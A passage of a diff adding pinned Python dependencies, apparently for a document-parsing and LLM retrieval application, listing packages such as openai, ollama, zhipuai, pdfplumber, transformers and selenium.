+ httpcore==1.0.4
44
+ httpx==0.27.0
45
+ huggingface-hub==0.20.3
46
+ humanfriendly==10.0
47
+ idna==3.7
48
+ itsdangerous==2.1.2
49
+ Jinja2==3.1.4
50
+ joblib==1.3.2
51
+ lxml==5.1.0
52
+ MarkupSafe==2.1.5
53
+ minio==7.2.4
54
+ mpmath==1.3.0
55
+ multidict==6.0.5
56
+ multiprocess==0.70.16
57
+ networkx==3.2.1
58
+ nltk==3.9
59
+ numpy==1.26.4
60
+ # nvidia-cublas-cu12==12.1.3.1
61
+ # nvidia-cuda-cupti-cu12==12.1.105
62
+ # nvidia-cuda-nvrtc-cu12==12.1.105
63
+ # nvidia-cuda-runtime-cu12==12.1.105
64
+ # nvidia-cudnn-cu12==8.9.2.26
65
+ # nvidia-cufft-cu12==11.0.2.54
66
+ # nvidia-curand-cu12==10.3.2.106
67
+ # nvidia-cusolver-cu12==11.4.5.107
68
+ # nvidia-cusparse-cu12==12.1.0.106
69
+ # nvidia-nccl-cu12==2.19.3
70
+ # nvidia-nvjitlink-cu12==12.3.101
71
+ # nvidia-nvtx-cu12==12.1.105
72
+ ollama==0.1.9
73
+ # onnxruntime-gpu==1.17.1
74
+ openai==1.12.0
75
+ opencv-python==4.9.0.80
76
+ openpyxl==3.1.2
77
+ ormsgpack==1.5.0
78
+ packaging==23.2
79
+ pandas==2.2.1
80
+ pdfminer.six==20221105
81
+ pdfplumber==0.10.4
82
+ peewee==3.17.1
83
+ pillow==10.3.0
84
+ protobuf==4.25.3
85
+ psutil==5.9.8
86
+ psycopg2-binary==2.9.9
87
+ pyarrow==15.0.0
88
+ pyarrow-hotfix==0.6
89
+ pyclipper==1.3.0.post5
90
+ pycparser==2.21
91
+ pycryptodome
92
+ pycryptodome-test-vectors
93
+ pycryptodomex
94
+ pydantic==2.6.2
95
+ pydantic_core==2.16.3
96
+ PyJWT==2.8.0
97
+ PyMySQL==1.1.1
98
+ PyPDF2==3.0.1
99
+ pypdfium2==4.27.0
100
+ python-dateutil==2.8.2
101
+ python-docx==1.1.0
102
+ python-dotenv==1.0.1
103
+ python-pptx==0.6.23
104
+ PyYAML==6.0.1
105
+ qianfan==0.4.6
106
+ redis==5.0.3
107
+ regex==2023.12.25
108
+ replicate==0.31.0
109
+ requests==2.32.2
110
+ ruamel.yaml==0.18.6
111
+ ruamel.yaml.clib==0.2.8
112
+ safetensors==0.4.2
113
+ scikit-learn==1.5.0
114
+ scipy==1.12.0
115
+ sentence-transformers==2.4.0
116
+ shapely==2.0.3
117
+ six==1.16.0
118
+ sniffio==1.3.1
119
+ StrEnum==0.4.15
120
+ sympy==1.12
121
+ tencentcloud-sdk-python==3.0.1215
122
+ threadpoolctl==3.3.0
123
+ tika==2.6.0
124
+ tiktoken==0.6.0
125
+ tokenizers==0.15.2
126
+ torch==2.2.1
127
+ tqdm==4.66.3
128
+ transformers==4.38.1
129
+ # triton==2.2.0
130
+ typing_extensions==4.10.0
131
+ tzdata==2024.1
132
+ urllib3==2.2.2
133
+ Werkzeug==3.0.3
134
+ xgboost==2.0.3
135
+ XlsxWriter==3.2.0
136
+ xpinyin==0.7.6
137
+ xxhash==3.4.1
138
+ yarl==1.9.4
139
+ zhipuai==2.0.1
140
+ BCEmbedding
141
+ loguru==0.7.2
142
+ umap-learn
143
+ fasttext==0.9.2
144
+ volcengine==1.0.141
145
+ voyageai==0.2.3
146
+ opencv-python-headless==4.9.0.80
147
+ readability-lxml==0.8.1
148
+ html_text==0.6.2
149
+ selenium==4.21.0
150
+ webdriver-manager==4.0.1
151
+ cn2an==0.5.22
152
+ roman-numbers==1.0.2
153
+ word2number==1.1
154
+ markdown==3.6
155
+ mistralai==0.4.2
156
+ boto3==1.34.140
157
+ duckduckgo_search==6.1.9
158
+ google-generativeai==0.7.2
159
+ groq==0.9.0
160
+ wikipedia==1.4.0
161
+ Bio==1.7.1
162
+ arxiv==2.1.3
163
+ pypdf==4.3.0
164
+ google_search_results==2.4.2
165
+ editdistance==0.8.1
166
+ markdown_to_json==2.1.1
167
+ scholarly==1.7.11
168
+ deepl==1.18.0
169
+ psycopg2-binary==2.9.9
170
+ tabulate==0.9.0
171
+ vertexai==1.64.0
172
+ yfinance==0.1.96
173
+ pywencai==0.12.2
174
+ akshare==1.14.72
175
+ ranx==0.3.20